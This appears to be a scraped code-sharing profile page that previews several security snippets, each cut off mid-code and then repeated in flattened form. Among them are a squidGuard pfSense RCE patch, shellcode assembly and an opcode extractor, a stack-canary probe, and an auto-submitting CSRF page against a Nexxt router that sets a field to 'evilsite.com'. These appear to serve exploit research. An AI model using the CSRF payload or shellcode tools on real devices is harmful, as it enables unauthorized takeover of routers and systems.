cedric cedriczirtacic

## squidguard_pfsense_1.4._7_RCE.patch
--- squidguard_blacklist.php.old        2016-05-04 15:01:08.000000000 -0300
+++ squidguard_blacklist.php    2016-05-04 15:46:13.000000000 -0300
@@ -58,11 +58,19 @@
 function squidguard_blacklist_AJAX_response( $request )
 {
     $res = '';
+    $status = '';
     $sz  = 0;
     $pcaption = '&nbsp;';


## cryptolads.1.1.pl
#!/bin/env perl

while(<>){
    chomp;
    $uhex = pack('H*', $_);
    $udec = pack('u', $uhex );
    $udec =~s/(^.|[\n\r])//mg;
    $udec =~tr#` -_#AA-Za-z0-9+/#;
    print $udec, $/;
}

## ddclient.service
#/usr/lib/systemd/system/ddclient.service
[Unit]
Description=ddclient Service
After=network.target

[Service]
Type=forking
PIDFile=/var/run/ddclient.pid
ExecStart=/sbin/ddclient -pid /var/run/ddclient.pid -file /etc/ddclient/ddclient.conf -daemon 300
ExecStop=/usr/bin/pkill -SIGKILL -P /var/run/ddclient.pid

## nexxt_exploit1.html
<body onload='document.forms[0].submit()'>
    <form action='http://192.168.0.1/goform/SysStatusHandle' method='post'>
        <input type="hidden" name="CMD" value="WAN_CON" />
        <input type="hidden" name="GO" value="http://evilsite.com" />
        <input type="hidden" name="action" value='2' />
    </form>
</body>

## yes.S
// gcc -c yes.S -o yes.o && gcc yes.o -o yes
    .file       "yes.S"
    .data
y:  .string "y"
    .text
    .globl      main
main:
    cmpq    $2, %rdi
    jl      .L1

## normal.S
_start:
    xorq %rax, %rax
    movb $0x3c, %al
    xorq %rdi, %rdi
    incb %dil
    syscall

## opcodes.pl
#!/usr/bin/perl -w

use strict;
use warnings;

my $bin = $ARGV[0];
my $func= $ARGV[1];
die("./$0 <binary> <function>") if (!defined $bin or !defined $func);

my @shellcode;

## load_opcodes.S
.section .text
.global _start
_start:
    pushq %rbp
    movq %rsp, %rbp
    subq $13, %rsp
shellcode:
    movb $0x05, -1(%rbp)
    movb $0x0f, -2(%rbp)
    movb $0xc7, -3(%rbp)

## gdb.sh
(gdb) disas main
Dump of assembler code for function main:
   0x00000000004005ab <+0>:     sub    $0x18,%rsp
   0x00000000004005af <+4>:     mov    %fs:0x28,%rax
   0x00000000004005b8 <+13>:    mov    %rax,0x8(%rsp)
   0x00000000004005bd <+18>:    xor    %eax,%eax
   0x00000000004005bf <+20>:    callq  0x400566 <get_canary>
   0x00000000004005c4 <+25>:    mov    (%rax),%rsi
   0x00000000004005c7 <+28>:    mov    $0x400688,%edi
   0x00000000004005cc <+33>:    mov    $0x0,%eax

## main.c
// gcc -O1 -fstack-protector-all -o main main.c
#include <stdio.h>
#include <linux/types.h>

#ifndef uint64_t
    typedef unsigned long   uint64_t;
#endif

uint64_t get_canary() {
    uint64_t a;
	--- squidguard_blacklist.php.old 2016-05-04 15:01:08.000000000 -0300
	+++ squidguard_blacklist.php 2016-05-04 15:46:13.000000000 -0300
	@@ -58,11 +58,19 @@
	function squidguard_blacklist_AJAX_response( $request )
	{
	$res = '';
	+ $status = '';
	$sz = 0;
	$pcaption = ' ';
	#!/bin/env perl

	while(<>){
	chomp;
	$uhex = pack('H*', $_);
	$udec = pack('u', $uhex );
	$udec =~s/(^.\|[\n\r])//mg;
	$udec =~tr#` -_#AA-Za-z0-9+/#;
	print $udec, $/;
	}
	#/usr/lib/systemd/system/ddclient.service
	[Unit]
	Description=ddclient Service
	After=network.target

	[Service]
	Type=forking
	PIDFile=/var/run/ddclient.pid
	ExecStart=/sbin/ddclient -pid /var/run/ddclient.pid -file /etc/ddclient/ddclient.conf -daemon 300
	ExecStop=/usr/bin/pkill -SIGKILL -P /var/run/ddclient.pid
	<body onload='document.forms[0].submit()'>
	<form action='http://192.168.0.1/goform/SysStatusHandle' method='post'>
	<input type="hidden" name="CMD" value="WAN_CON" />
	<input type="hidden" name="GO" value="http://evilsite.com" />
	<input type="hidden" name="action" value='2' />
	</form>
	</body>
	// gcc -c yes.S -o yes.o && gcc yes.o -o yes
	.file "yes.S"
	.data
	y: .string "y"
	.text
	.globl main
	main:
	cmpq $2, %rdi
	jl .L1
	_start:
	xorq %rax, %rax
	movb $0x3c, %al
	xorq %rdi, %rdi
	incb %dil
	syscall
	#!/usr/bin/perl -w

	use strict;
	use warnings;

	my $bin = $ARGV[0];
	my $func= $ARGV[1];
	die("./$0 <binary> <function>") if (!defined $bin or !defined $func);

	my @shellcode;
	.section .text
	.global _start
	_start:
	pushq %rbp
	movq %rsp, %rbp
	subq $13, %rsp
	shellcode:
	movb $0x05, -1(%rbp)
	movb $0x0f, -2(%rbp)
	movb $0xc7, -3(%rbp)
	(gdb) disas main
	Dump of assembler code for function main:
	0x00000000004005ab <+0>: sub $0x18,%rsp
	0x00000000004005af <+4>: mov %fs:0x28,%rax
	0x00000000004005b8 <+13>: mov %rax,0x8(%rsp)
	0x00000000004005bd <+18>: xor %eax,%eax
	0x00000000004005bf <+20>: callq 0x400566 <get_canary>
	0x00000000004005c4 <+25>: mov (%rax),%rsi
	0x00000000004005c7 <+28>: mov $0x400688,%edi
	0x00000000004005cc <+33>: mov $0x0,%eax
	// gcc -O1 -fstack-protector-all -o main main.c
	#include <stdio.h>
	#include <linux/types.h>

	#ifndef uint64_t
	typedef unsigned long uint64_t;
	#endif

	uint64_t get_canary() {
	uint64_t a;